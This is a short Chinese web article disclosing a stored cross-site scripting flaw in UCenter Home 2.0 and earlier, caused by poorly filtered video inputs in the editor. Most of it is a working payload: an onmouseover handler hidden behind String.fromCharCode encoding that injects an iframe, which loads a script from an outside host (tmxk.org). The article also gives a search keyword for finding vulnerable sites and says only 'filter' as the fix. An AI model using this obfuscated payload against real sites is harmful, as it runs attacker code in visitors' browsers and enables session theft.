• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    Ucenter Home 2.0及以下存储型XSS

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    【漏洞原理】

    编辑器插入视频input过滤不严,导致日志和群组模块发帖可插入代码。

    【测试代码】涛涛电脑知识

    发帖包含以下代码:涛涛电脑知识网

    点击开新窗口欣赏该FLASH动画![全屏欣赏]
    " onmouseover='document.body.innerHTML=String.fromCharCode(60,105,102,114,97,109,101,47,111,110,108,111,97,100,61,39,106,97,118,97,115,99,114,105,112,116,58,119,114,105,116,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,54,48,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,51,50,44,49,49,53,44,49,49,52,44,57,57,44,54,49,44,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,49,54,44,49,48,57,44,49,50,48,44,49,48,55,44,52,54,44,49,49,49,44,49,49,52,44,49,48,51,44,52,55,44,49,49,51,44,52,54,44,49,48,54,44,49,49,53,44,54,50,44,54,48,44,52,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,54,50,41,41,39,62)'\

    【关键字】

    powered by ucenter home 2.0

    漏洞证明:2.0漏洞举例:

    ///space.php?uid=11&do=blog&id=4

     

     

     

    1.5漏洞举例:

     


     

     

    修复方案:

    过滤

     

  • 上一篇:小记拿kuke+jsp上漏洞分析
  • 下一篇:phpcms v9 文章评论过滤不严数据库敏感信息
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1